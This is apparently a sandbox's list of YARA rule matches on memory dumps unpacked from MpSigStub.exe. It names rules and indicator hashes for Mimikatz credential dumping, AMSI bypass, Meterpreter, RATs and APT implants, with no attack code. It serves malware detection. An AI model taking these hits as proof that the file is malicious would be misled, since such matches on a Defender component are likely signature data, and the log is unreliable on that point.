Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 36.3.MpSigStub.exe.197a4dc6bfe.87.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a424480d.93.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a424480d.93.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a424480d.93.raw.unpack, type: UNPACKEDPE	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 36.3.MpSigStub.exe.197a434950c.82.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a434950c.82.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a48adbfa.121.unpack, type: UNPACKEDPE	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4fa798e.114.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa798e.114.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a3f2f03e.60.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a37e9bde.71.raw.unpack, type: UNPACKEDPE	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a3e184e5.98.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a3e184e5.98.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 36.3.MpSigStub.exe.197a3d9206c.229.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a3d9206c.229.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a36a8ae6.146.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
